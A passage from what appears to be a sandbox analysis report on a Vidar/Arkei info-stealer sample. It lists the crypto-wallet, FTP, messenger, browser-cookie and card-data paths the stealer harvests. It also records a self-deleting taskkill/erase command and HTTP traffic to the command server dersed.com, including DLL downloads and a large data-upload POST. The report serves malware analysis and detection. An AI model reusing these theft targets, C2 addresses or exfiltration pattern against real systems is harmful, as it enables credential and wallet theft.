  829. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin\\*.*"
  830.  
  831.  
  832. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  833.  
  834.  
  835. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  836.  
  837.  
  838. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin\\"
  839.  
  840.  
  841. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin\\*.*"
  842.  
  843.  
  844. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  845.  
  846.  
  847. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  848.  
  849.  
  850. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin\\"
  851.  
  852.  
  853. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin\\*.*"
  854.  
  855.  
  856. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  857.  
  858.  
  859. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  860.  
  861.  
  862. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\\n"
  863.  
  864.  
  865. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  866.  
  867.  
  868. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  869.  
  870.  
  871. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin\\"
  872.  
  873.  
  874. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin\\*.*"
  875.  
  876.  
  877. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  878.  
  879.  
  880. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin\\*.*"
  881.  
  882.  
  883. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  884.  
  885.  
  886. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin\\"
  887.  
  888.  
  889.  
  890.  
  891. "Description": "Harvests credentials from local FTP client softwares",
  892. "Details":
  893.  
  894. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  895.  
  896.  
  897.  
  898.  
  899. "Description": "Harvests information related to installed instant messenger clients",
  900. "Details":
  901.  
  902. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  903.  
  904.  
  905.  
  906.  
  907. "Description": "Collects information to fingerprint the system",
  908. "Details":
  909.  
  910.  
  911. "Description": "Created network traffic indicative of malicious activity",
  912. "Details":
  913.  
  914. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  915.  
  916.  
  917.  
  918.  
  919. "Description": "Uses suspicious command line tools or Windows utilities",
  920. "Details":
  921.  
  922. "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
  923.  
  924.  
  925. "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
  926.  
  927.  
  928. "command": "taskkill /im 8JB5A.exe /f"
  929.  
  930.  
  931.  
  932.  
  933.  
  934. * Started Service:
  935. "VaultSvc"
  936.  
  937.  
  938. * Mutexes:
  939. "Global\\CLR_PerfMon_WrapMutex",
  940. "Global\\CLR_CASOFF_MUTEX",
  941. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
  942. "Global\\ADAP_WMI_ENTRY",
  943. "Global\\RefreshRA_Mutex",
  944. "Global\\RefreshRA_Mutex_Lib",
  945. "Global\\RefreshRA_Mutex_Flag"
  946.  
  947.  
  948. * Modified Files:
  949. "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
  950. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\passwords.txt",
  951. "C:\\ProgramData\\freebl3.dll",
  952. "C:\\ProgramData\\mozglue.dll",
  953. "C:\\ProgramData\\msvcp140.dll",
  954. "C:\\ProgramData\\nss3.dll",
  955. "C:\\ProgramData\\softokn3.dll",
  956. "C:\\ProgramData\\vcruntime140.dll",
  957. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\ld",
  958. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\historych",
  959. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History\\Google Chrome_Default.txt",
  960. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads\\Google Chrome_Default.txt",
  961. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\c",
  962. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt",
  963. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\wd",
  964. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill\\Google Chrome_Default.txt",
  965. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC\\Google Chrome_Default.txt",
  966. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft\\Authy\\\\xef\\x94\\x98Q\\xc9\\x86",
  967. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt",
  968. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt",
  969. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\cookie_list.txt",
  970. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\information.txt",
  971. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin\\\\x12",
  972. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Ethereum\\",
  973. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum\\\n",
  974. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectrumLTC\\",
  975. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus\\\n",
  976. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus\\",
  977. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectronCash\\",
  978. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MultiDoge\\\n",
  979. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Zcash\\",
  980. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DashCore\\",
  981. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin\\",
  982. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin\\",
  983. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin\\",
  984. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin\\",
  985. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin\\",
  986. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin\\",
  987. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko\\",
  988. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin\\",
  989. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\GoldCoinGLD\\\n",
  990. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin\\",
  991. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IOCoin\\",
  992. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin\\",
  993. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin\\",
  994. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin\\",
  995. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin\\",
  996. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin\\",
  997. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin\\",
  998. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin\\",
  999. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\JAXX\\",
  1000. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\screenshot.jpg",
  1001. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\US_00000000-0000-0000-0000-0000000000002566241227.zip",
  1002. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  1003. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  1004. "\\Device\\LanmanDatagramReceiver",
  1005. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  1006.  
  1007.  
  1008. * Deleted Files:
  1009. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1732.26820656",
  1010. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1732.26820671",
  1011. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1732.26820671",
  1012. "C:\\ProgramData\\freebl3.dll",
  1013. "C:\\ProgramData\\mozglue.dll",
  1014. "C:\\ProgramData\\msvcp140.dll",
  1015. "C:\\ProgramData\\nss3.dll",
  1016. "C:\\ProgramData\\softokn3.dll",
  1017. "C:\\ProgramData\\vcruntime140.dll",
  1018. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill\\Google Chrome_Default.txt",
  1019. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill",
  1020. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC\\Google Chrome_Default.txt",
  1021. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC",
  1022. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt",
  1023. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt",
  1024. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt",
  1025. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies",
  1026. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\cookie_list.txt",
  1027. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads\\Google Chrome_Default.txt",
  1028. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads",
  1029. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History\\Google Chrome_Default.txt",
  1030. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History",
  1031. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\information.txt",
  1032. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\passwords.txt",
  1033. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\screenshot.jpg",
  1034. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft\\Authy",
  1035. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft",
  1036. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin",
  1037. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin",
  1038. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin",
  1039. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DashCore",
  1040. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin",
  1041. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin",
  1042. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectronCash",
  1043. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum",
  1044. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectrumLTC",
  1045. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Ethereum",
  1046. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus",
  1047. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin",
  1048. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko",
  1049. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin",
  1050. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\GoldCoinGLD",
  1051. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin",
  1052. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IOCoin",
  1053. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin",
  1054. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\JAXX",
  1055. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin",
  1056. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin",
  1057. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin",
  1058. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MultiDoge",
  1059. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin",
  1060. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin",
  1061. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin",
  1062. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin",
  1063. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Zcash",
  1064. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets",
  1065. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\US_00000000-0000-0000-0000-0000000000002566241227.zip",
  1066. "C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe",
  1067. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  1068.  
  1069.  
  1070. * Modified Registry Keys:
  1071. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
  1072. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\633E54B2-2944-4AC4-90FA-C69D6C08EDCB",
  1073. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
  1074. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\55EB258C-A9EA-4DA4-A8EF-E736F5A950CE",
  1075. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
  1076. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\C47FF73B-279F-4D5D-8B65-FD7750272025",
  1077. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\67AD5638-AA7B-49DE-8A67-3D392C370D2A",
  1078. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\633E54B2-2944-4AC4-90FA-C69D6C08EDCB\\data",
  1079. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\55EB258C-A9EA-4DA4-A8EF-E736F5A950CE\\data",
  1080. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\C47FF73B-279F-4D5D-8B65-FD7750272025\\data",
  1081. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\67AD5638-AA7B-49DE-8A67-3D392C370D2A\\data"
  1082.  
  1083.  
  1084. * Deleted Registry Keys:
  1085.  
  1086. * DNS Communications:
  1087.  
  1088. "type": "A",
  1089. "request": "dersed.com",
  1090. "answers":
  1091.  
  1092. "data": "104.200.67.209",
  1093. "type": "A"
  1094.  
  1095.  
  1096.  
  1097.  
  1098. "type": "A",
  1099. "request": "ip-api.com",
  1100. "answers":
  1101.  
  1102. "data": "72.11.140.50",
  1103. "type": "A"
  1104.  
  1105.  
  1106. "data": "66.212.29.250",
  1107. "type": "A"
  1108.  
  1109.  
  1110.  
  1111.  
  1112.  
  1113. * Domains:
  1114.  
  1115. "ip": "104.200.67.209",
  1116. "domain": "dersed.com"
  1117.  
  1118.  
  1119. "ip": "72.11.140.50",
  1120. "domain": "ip-api.com"
  1121.  
  1122.  
  1123.  
  1124. * Network Communication - ICMP:
  1125.  
  1126. * Network Communication - HTTP:
  1127.  
  1128. "count": 1,
  1129. "body": "--1BEF0A57BE110FD467A--\r\n",
  1130. "uri": "http://dersed.com/288",
  1131. "user-agent": "",
  1132. "method": "POST",
  1133. "host": "dersed.com",
  1134. "version": "1.1",
  1135. "path": "/288",
  1136. "data": "POST /288 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  1137. "port": 80
  1138.  
  1139.  
  1140. "count": 1,
  1141. "body": "",
  1142. "uri": "http://dersed.com/freebl3.dll",
  1143. "user-agent": "",
  1144. "method": "GET",
  1145. "host": "dersed.com",
  1146. "version": "1.1",
  1147. "path": "/freebl3.dll",
  1148. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1149. "port": 80
  1150.  
  1151.  
  1152. "count": 1,
  1153. "body": "",
  1154. "uri": "http://dersed.com/mozglue.dll",
  1155. "user-agent": "",
  1156. "method": "GET",
  1157. "host": "dersed.com",
  1158. "version": "1.1",
  1159. "path": "/mozglue.dll",
  1160. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1161. "port": 80
  1162.  
  1163.  
  1164. "count": 1,
  1165. "body": "",
  1166. "uri": "http://dersed.com/msvcp140.dll",
  1167. "user-agent": "",
  1168. "method": "GET",
  1169. "host": "dersed.com",
  1170. "version": "1.1",
  1171. "path": "/msvcp140.dll",
  1172. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1173. "port": 80
  1174.  
  1175.  
  1176. "count": 1,
  1177. "body": "",
  1178. "uri": "http://dersed.com/nss3.dll",
  1179. "user-agent": "",
  1180. "method": "GET",
  1181. "host": "dersed.com",
  1182. "version": "1.1",
  1183. "path": "/nss3.dll",
  1184. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1185. "port": 80
  1186.  
  1187.  
  1188. "count": 1,
  1189. "body": "",
  1190. "uri": "http://dersed.com/softokn3.dll",
  1191. "user-agent": "",
  1192. "method": "GET",
  1193. "host": "dersed.com",
  1194. "version": "1.1",
  1195. "path": "/softokn3.dll",
  1196. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1197. "port": 80
  1198.  
  1199.  
  1200. "count": 1,
  1201. "body": "",
  1202. "uri": "http://dersed.com/vcruntime140.dll",
  1203. "user-agent": "",
  1204. "method": "GET",
  1205. "host": "dersed.com",
  1206. "version": "1.1",
  1207. "path": "/vcruntime140.dll",
  1208. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1209. "port": 80
  1210.  
  1211.  
  1212. "count": 2,
  1213. "body": "--1BEF0A57BE110FD467A--\r\n",
  1214. "uri": "http://ip-api.com/line/",
  1215. "user-agent": "",
  1216. "method": "POST",
  1217. "host": "ip-api.com",
  1218. "version": "1.1",
  1219. "path": "/line/",
  1220. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  1221. "port": 80
  1222.  
  1223.  
  1224. "count": 1,
  1225. "body": "",
  1226. "uri": "http://dersed.com/",
  1227. "user-agent": "",
  1228. "method": "POST",
  1229. "host": "dersed.com",
  1230. "version": "1.1",
  1231. "path": "/",
  1232. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40452\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  1233. "port": 80
  1234.  
  1235.  
  1236.  
  1237. * Network Communication - SMTP:
  1238.  
  1239. * Network Communication - Hosts:
  1240.  
  1241. "country_name": "United States",
  1242. "ip": "72.11.140.50",
  1243. "inaddrarpa": "",
  1244. "hostname": "ip-api.com"
  1245.  
  1246.  
  1247. "country_name": "United States",
  1248. "ip": "104.200.67.209",
  1249. "inaddrarpa": "",
  1250. "hostname": "dersed.com"
  1251.  
  1252.  
  1253.  
  1254. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!